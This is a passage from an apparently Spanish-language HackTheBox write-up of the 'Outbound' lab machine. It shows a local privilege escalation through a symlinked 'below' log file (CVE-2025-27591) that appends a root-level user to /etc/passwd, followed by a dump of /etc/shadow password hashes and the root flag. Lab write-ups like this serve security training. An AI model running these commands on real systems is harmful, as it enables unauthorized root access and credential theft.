2
3
4
5
6
7
8
9


jacob@outbound:~$ echo "sckull:$(openssl passwd -1 sckull):0:0:root:/root:/bin/bash" >> /etc/passwd
jacob@outbound:~$ su sckull
Password: 
root@outbound:/home/jacob# cd
root@outbound:~# ls
root.txt
root@outbound:~# cat root.txt 
bd33658a197d98897d10093eff0cca68
root@outbound:~#

Commands

 1
 2
 3
 4
 5
 6
 7
 8
 9
10


# delete log file
rm /var/log/below/error_root.log
# create symlink
ln -sf /etc/passwd /var/log/below/error_root.log
# run below command
sudo below record
# add new user to /etc/passwd
echo "sckull:$(openssl passwd -1 sckull):0:0:root:/root:/bin/bash" >> /etc/passwd
# change to that user
su sckull

Dump Hashes

Realizamos la lectura del archivo /etc/shadow.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38


root@outbound:~# cat /etc/shadow
root:$y$j9T$pYysWAL0lX2oSXNpBeXs81$yinIBrOJnhJj7viI.GiorNEgZFyIewJbS3qnjgXth16:20247:0:99999:7:::
daemon:*:20135:0:99999:7:::
bin:*:20135:0:99999:7:::
sys:*:20135:0:99999:7:::
sync:*:20135:0:99999:7:::
games:*:20135:0:99999:7:::
man:*:20135:0:99999:7:::
lp:*:20135:0:99999:7:::
mail:*:20135:0:99999:7:::
news:*:20135:0:99999:7:::
uucp:*:20135:0:99999:7:::
proxy:*:20135:0:99999:7:::
www-data:*:20135:0:99999:7:::
backup:*:20135:0:99999:7:::
list:*:20135:0:99999:7:::
irc:*:20135:0:99999:7:::
_apt:*:20135:0:99999:7:::
nobody:*:20135:0:99999:7:::
systemd-network:!*:20135::::::
systemd-timesync:!*:20135::::::
messagebus:!:20135::::::
systemd-resolve:!*:20135::::::
pollinate:!:20135::::::
polkitd:!*:20135::::::
syslog:!:20135::::::
uuidd:!:20135::::::
tcpdump:!:20135::::::
tss:!:20135::::::
landscape:!:20135::::::
fwupd-refresh:!*:20135::::::
usbmux:!:20178::::::
sshd:!:20178::::::
_laurel:!:20178::::::
mel:$y$j9T$5lR6zOH0Y8G/9ZDhogu2o0$9..CpGSBi06uovpNhGjqaMhPkc3Yw/svG9T3bSBoeS2:20247:0:99999:7:::
tyler:$y$j9T$t1QDz.OaqfevjpnRfQrRY.$jJwx2.H.OkiHiW8T0f.3A1qS5ZfA7.nmwU3TE1otfb.:20247:0:99999:7:::
jacob:$y$j9T$5JYw1WIG1mlmMdj6BrGVV/$yimg6djeBwfHAaDiOPoU0le/aURm6fRaG.DXzBkmmmA:20247:0:99999:7:::
root@outbound:~#

HackTheBox - Outbound

Machine Information: Certified

Recon

nmap

Services Access

Web Site

Roundcube Webmail

CVE-2025-49113

User - www-data

Database

User - Tyler

Roundcube Database

User Password

Decrypt Password

User - Jacob

Privesc

CVE-2025-27591

Exploit

Shell

Commands

Dump Hashes

HackTheBox - Outbound

HackTheBox - Outbound

Machine Information: Certified

Recon

nmap

Services Access

Web Site

Roundcube Webmail

CVE-2025-49113

User - www-data

Database

User - Tyler

Roundcube Database

User Password

Decrypt Password

User - Jacob

Privesc

CVE-2025-27591

Exploit

Shell

Commands

Dump Hashes

Read other posts

HackTheBox - Outbound